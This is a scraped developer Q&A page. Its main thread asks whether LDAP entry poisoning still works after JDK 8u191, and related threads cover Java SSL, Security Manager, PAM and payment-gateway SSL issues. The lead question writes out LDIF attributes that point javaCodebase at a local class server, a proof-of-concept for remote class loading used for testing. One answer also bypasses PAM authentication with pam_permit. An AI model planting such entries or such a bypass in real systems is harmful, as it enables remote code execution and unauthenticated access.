LDAP Entry Poisoning Fixed in jdk-8u191? - java

Fortify has reported an LDAP Entry Poisoning vulnerability in one of my Spring applications. You can get additional information on this vulnerability from the following links:
https://www.youtube.com/watch?v=Y8a5nB-vy78&feature=youtu.be&t=2111
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
I decided to try and prove for myself if this was still a vulnerability. I did this by using Spring Tool Suite:
file -> new -> import spring getting started content
searched for ldap
and imported the Authenticating Ldap -> complete code set
https://spring.io/guides/gs/authenticating-ldap/
I then added the following lines to the included test-server.ldif file to the entry for bob as well as the entry for developers:
javaFactory: PayloadObject
objectClass: javaNamingReference
javaCodebase: http://127.0.0.1:9999/
javaClassName: PayloadObject
In order to run this, I needed to add the following line to application.properties:
spring.ldap.embedded.validation.enabled=false
I started up Wireshark and ran the Spring sample app, and sure enough, when I logged in with bob, I got a hit in Wireshark on port 9999.
When I asked a co-worker to test the same thing, he was unable to reproduce. After some research, we discovered that he had a newer jdk than I, and after I updated my jdk, I, too, was unable to reproduce the issue.
We narrowed it down to jdk-8u191 was the version that introduced "the fix", but I can't find anything that explains why or how it was fixed in the java release notes.
My question is - is LDAP Entry Poisoning now a false/positive if we're running jdk-8u191 or newer? Or is there some configuration option that can be set to override this "fix"?

8u191 closed a remote class loading vulnerability in LDAP, though research is ongoing. Whenever you are turning a stream of bytes into an Object in Java, you want to think about class loading (what 8u191 addressed), but also insecure deserialization.
When CVEs are addressed, they are not typically in the release notes.
As for whether or not the alert from Fortify is a false positive, I think it is more important to assess the risk relative to your application.
To leverage this vulnerability, for example, the attacker would at least need direct access to your LDAP instance (see pg 31), which likely indicates a larger security issue. 8u191 and after, the attacker would additionally need to find a class in your classpath that is vulnerable to insecure deserialization to reproduce what the BH talk demonstrates.

Related

Getting SSL error when tring to hit a REST webservice(GET call)?

my team is facing a SSLException when we try to hit a REST based webservice. We are adding all the headers required to call the webservice.
Right now we have got a temporary solution to the problem. We have added the security file from Java 8 folder to the Java 7 folder.
There is one more socket based solution which our team tried, but I don't know it on the larger context. But it has been refused to implement too by higher authorities.
We have found that the webservice is based on java 5. And in java 7 some of the security certificates were not available due to which we were getting an error. The first solution works for the testing phase but it's not good for production purposes.
The actual error we are facing is:
javax.net.ssl.SSLException: java.lang.RuntimeException: Could not generate DH keypair
During our research we found this question too and tried to follow up every solution given for this question.
So is there anyone who has faced the similar issue before and provide us with a solution to apply, so that we can hit the webservice and add those certificates dynamically at runtime.
Please post the SSL debug logs?
I had this problem once and reason was that remote rest service were only supporting TLSv1.2 and we were on TLSv1.1
We called the rest service by mentioning TLSv1.1 protocol in System.setProperty() method.
The problem was with the Java version. The security files which were needed by the rest service to hit were not present in Java 1.7.51(our current java version). So instead of changing the security files we upgraded our java version from 1.7.51 to 1.7.80(This version of java contains those security files). Hence no compatibility was broken and the issue was fixed successfully without a workaround.
We got this solution's idea from this StackOverflow Question.

Which permission to set, to avoid error with Security-Manager with https-URLS?

In a software for a customer we have to read given URLs to parse their content. Also the customer needs to activate Tomcat-Security-Manager to let Java-Policies control what the program does.
Now, with reading URLs the exception "javax.net.ssl.SSLKeyException: RSA premaster secret error" happens, but only under certain conditions:
if the URL is HTTPS but not for HTTP
if the Security-Manager is activated, not when it is deactivated or
if in a global grant-Block the AllPermission is set
only with Java 6, not with Java 7 (the customer needs Java 6 currently)
only with Tomcat6, not with Tomcat 7 (the customer needs Tomcat 6 currently)
The Security-violation happens somewhere in Java-Code, an AllPermission restricted to our codebase doesn't prevent the error.
So, does someone has an idea, which permission to set for Java 6, so that it can process HTTPS?
Other information: It's running inside a tomcat, on a Debian-Linux with OpenJDK.
EDIT: I added the Java-Param "-Djava.security.debug=access,failure" to Tomcats /etc/default/tomcat6 in the variable JAVA_OPTS. But in the Logs I have no additional messages. Might it be possible the code asks the permissions before triggering them?
EDIT2: I found the correct place and got the full stacktrace (removed specific customer parts):
javax.net.ssl.SSLKeyException: RSA premaster secret error
at [...]
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at java.lang.Thread.run(Thread.java:701)
Caused by: java.security.NoSuchAlgorithmException: SunTlsRsaPremasterSecret KeyGenerator not available
at javax.crypto.KeyGenerator.<init>(KeyGenerator.java:141)
at javax.crypto.KeyGenerator.getInstance(KeyGenerator.java:191)
... 14 more
EDIT3: So far I was under the assumption that the Java-class URL was used to access the contents of the resource. But that is untrue. It is using from Grails-Code the Groovy-URL-object with the getText()-method:
new URL(params.url).text
The error is happening on this line. It's Grails-version 2.2.4.
Solution following several comments and OP confirmation of resolution (summary)
The root cause is the presence of sunjce_provider.jar in multiple locations. This was discovered by the OP after it was suggested as one of a number of possible root causes (see the very end of this answer and the comment trail). As per OP's comment:
I have the sunjce_provider.jar in multiple directories. I tried to give all three locations for Java 6 the rights, although clearly only one is JAVA_HOME - and it worked. Somehow one of the other locations is used, although it isn't in the java.ext.dirs-property
Therefore the resolution in this case was to ensure that the app had rights to access the correct copy of sunjce_provider.jar
I've left the main points from my original answer and the comments that helped with diagnosis below for anyone who finds this later
Original answer and comments that led to solution
This will not happen with http because your web app (that is the client for this connection, even though it's running in tomcat), does not need to generate a key in this configuration.
The fact it only occurs when SecurityManager is enabled, but not if disabled or with global AllPermission suggests its a file permission error. It suggests that it is not a problem with the key length (e.g. the one mentioned here)
Other similar reports on the web indicate that the likely root cause is a missing jar (usually sunjce_provider.jar is cited). The stack trace confirms that the root cause exception is a NoSuchAlgorithmException where the KeyGenerator is looking for algorithm SunTlsRsaPremasterSecret and can't find it. In your case, as this only occurs with a particular SecurityManager configuration, it could be an inaccessible jar (due to security permissions).
My guess would be that you have not enabled grant codeBase permissions to the correct directory that contains the jar needed for your RSA keygen algorithm. My suggested course of action would be to go through your webapp and JRE directory structure to find where runtime jars are kept and ensure that they have permissions granted in catalina.policy.
In the default configuration - for instance - you should see somewhere
// These permissions apply to all shared system extensions
grant codeBase "file:${java.home}/jre/lib/ext/-" {
permission java.security.AllPermission;
};
For details of what this means exactly see this section of the tomcat security manager "How To". You need to check a few things - make sure that ${java.home}/jre/lib/ext/ is where your runtime jars are. If not - alter the path to point to the right place (it is where they are on my version of OpenJDK 6 - build 27). In particular you should see sunjce_provider.jar and sunpkcs11.jar in there. Make sure the above section exists in your policy file.
It may be that the code is depending on some jars that are within your webapp - e.g. in ${catalina.base}/path/to/your/webapp/WEB-INF/classes/ - in which case you need to grant permissions to that directory.
Other problems that cause same or similar symptoms
The app being unable to find or accesssunpkcs11.jar will give the same error message (verified on Ubuntu+openjdk6+tomcat6 system). It is likely that duplicate copies of that jar will, too.
check /etc/java-6-openjdk/security/java.security. It should list providers in there - check there's a line something like security.provider.n = sun.security.pkcs11.SunPKCS11 in there - if that line is missing you also get this error (verified on same system)
This Debian bug report talks about problems with the location of jars when running under a SecurityManager
Debugging comment
As per the other answer, you might try adding -Djava.security.debug=access,failure to CATALINA_OPTS or JAVA_OPTS in your catalina.sh to enable debugging - which should log to catalina.out by default (or wherever you have set your logging to via CATALINA_OUT in catalina.sh. You should see output from the SecurityManager there.
You can also try -Djava.security.debug=all. You will get a huge catalina.out`, but you can grep for words that might help (like "fail"!!!)
Follow the code from the stack trace
Your exception is being thrown here. Looking at how that exception could be thrown - this method must return null. It swallows Exceptions - which isn't nice and makes it hard to diagnose exactly which part of that code is failing. My money would be on this line - where canUseProvider() might return false. This all points back to the provider jar being incaccessible for some reason.
I'm assuming you didn't see any access violations in the output, even with -Djava.security.debug=access,failure. You could try -Djava.security.debug=all, although that may well simply produce more irrelevant logging. If there is no access violation, you may have two versions of that jar on your classpath somehow and the runtime is accessing (or trying to access the wrong one). A case similar to this is described in this Q/A.
The easy way to discover all required permissions is to run with the argument
-Djava.security.debug=access,failure
You will then be given complete information on every failed security access, the protection domain that was in force, etc.

Cryptix setup with java-bridge on ubuntu is throwing algorithm not found error

I am trying to setup a payment gateway. For which I have setup a java bridge as the portal is a java machine. My setup is following :
Apache server
Tomcat 7
Java-6-open jdk
following is error from catalina.out
PospostSSL><Exception in encrypting data. algorithm DES/ECB is
not available from provider Cryptix>
<PostLib><postSSL><SFAApplicationException. Error while encrypting
data. Transaction cannot be processed.>
I have placed the cryptix32.jar in shared folder of tomcat. Also adding or removing line from java.security for cryptix provider is also not having any effect.
Please can any one tell me what needs to be done to get this error out.
So you are trying to set up a payment portal using DES and Cryptix? Then you are proposing to use Apache - probably with OpenSSL - as proxy. A proxy to a Java version that is basically end of life. And you are using one without commercial support.
"DES/ECB" is part of the standard SunJCE provider as well. No need for Cryptix there.
Please stop resurrecting the dead and go do something else.

PAM "pam_unix.so" authentication sometimes fails

I'm having some trouble with PAM. I have a tomcat webapp that uses PAM to authenticate. During install we make a symbolic link in /etc/pam.d to the /etc/pam.d/sshd file. This has always worked.
Recently I added a way for users to authenticate each request (rather than using a JSESSIONID cookie). This was added because we need to batch load some data into a monitoring application periodically and using Basic Auth was easy.
If I curl my webservice repeatedly (like 10 times a second), then every once in a while PAM will fail. This happens around once every 500 times, though my client claims that it happens once every couple of times (note that they are running remotely, though i don't see why that matters).
I have replaced my sym-linked pam config with a minimal config of:
#%PAM-1.0
auth sufficient pam_unix.so audit
auth required pam_deny.so
I have also added this to my /etc/syslog.conf
*.debug /var/log/debug.log
The only applicable log messages can be found in the debug.log:
Mar 12 09:49:32 arques java: pam_unix(foo:auth): unable to obtain a password
Mar 12 09:49:32 arques java: pam_unix(foo:auth): auth could not identify password for [root]
How do I debug this further? I have tried:
Using different hosts. One which is a brand new install
I've turned off the nscd service
I'm having a similar problem with a Java application that uses PAM for authentication. For now, I'm guessing the problem is within the distributed Java PAM binding implementation on CentOS 6.4. I no longer have access to that system (but I'm still trying to solve this problem) so I cannot provide specifics such as JDK version, etc.
My solution ultimately was to harshly kludge PAM:
#%PAM-
auth sufficient pam_debug.so
To make this more explicit, you could use "pam_permit.so" instead.
That's it, basically. Any valid user would then be authenticated, with or without password. Ugh.
I'm continuing to research better answers.

CFHTTP: find out supported version of SSL & test auth.net with SSL 3.0

I recently received an email from Authorize.net saying:
During the week of March 16 - 20,
2009, Authorize.Net will be
deprecating all legacy support for the
SSL 2.0 protocol. Changes have
recently been made to the Payment Card
Industry Data Security Standard (PCI
DSS) which have made the use of SSL
2.0 a PCI DSS violation.
So question is: how to make sure that my ColdFusion apps, using cfhttp to communicate with auth.net service, won't become broken in March?
Trying to find out which versions of SSL supported but can not find such info.
Any suggestions?
EDIT
Found discussions: one & two. Seems that only reliable way is upgrading to CF8.
So, other quesiton now: how to test my code with new auth.net protocol? Any ways to switch dev env before going live?
Also I've sent email to dev support of auth.net with these questions. If they'll provide me with solution -- will post it here.
Here is a nice article on www.talkingtree.com regarding the matter:
ColdFusion Protocol Tags CFHTTP, CFINVOKE, CFLDAP support SSLv2
It looks like CF8 is the first version to support SSLv3.
You can also get your hands really dirty and make SSLv3 requests directly, using Java. This would of course require changing working code to emulate functionality that would come naturally with CF8. But if upgrading is not an option for you, maybe this is a viable alternative.
I can't say much about how to test your code against Authorize.net, I'm afraid.
Okay, finally The Gods Have Spoken -- Auth.net Developer replied:
We would recommend that each user
verify their server SSL encryption
protocol settings. If you are unsure
where to find them a Google search of
the server type along with SSL 3.0
should provide helpful information in
this regard. Additionally, the server
support resources should provide this
information.
This change has been released to the
test environment. You may use the
following shared test account for
testing purposes if you wish:
Login ID: xxxxxxxx
Password: xxxxxxxxx
Login URL: https://test.authorize.net
API Login ID: xxxxxxxx
Transaction Key: xxxxxxxxx
Post to URL: https://test.authorize.net/gateway/transact.dll
Note: this is new test account, but I think that all test accounts are changed now, will try to test.
At least, now I am able to test my transactions in sandbox before changes do live, that's what I've wanted.

Categories